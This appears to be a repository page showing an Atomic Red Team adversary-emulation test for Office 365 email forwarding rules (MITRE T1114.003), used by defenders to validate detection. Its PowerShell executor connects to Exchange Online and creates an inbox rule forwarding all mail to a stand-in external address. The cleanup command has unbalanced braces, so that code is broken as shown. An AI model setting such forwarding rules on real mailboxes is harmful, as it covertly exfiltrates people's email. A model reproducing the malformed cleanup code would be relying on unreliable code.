security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1114.003/T1114.003.yaml
T
Carrie Roberts dbcf181202 fix typo (#2358) 
Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com>
2023-03-13 12:53:33 -06:00

51 lines
2.1 KiB
YAML
Raw Permalink Blame History

attack_technique: T1114.003
display_name: 'Email Collection: Email Forwarding Rule'
atomic_tests:
- name: Office365 - Email Forwarding
auto_generated_guid: 3234117e-151d-4254-9150-3d0bac41e38c
description: |
Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default:
password:
description: office-365 password
type: string
default:
rule_name:
description: email rule name
type: string
default: "Atomic Red Team Email Rule"
forwarding_email:
description: destination email addresses
type: string
default: "Atomic_Operator@fakeemail.aq"
dependency_executor_name: powershell
dependencies:
- description: |
ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license.
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: |
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
name: powershell
elevation_required: false
Reference in New Issue View Git Blame Copy Permalink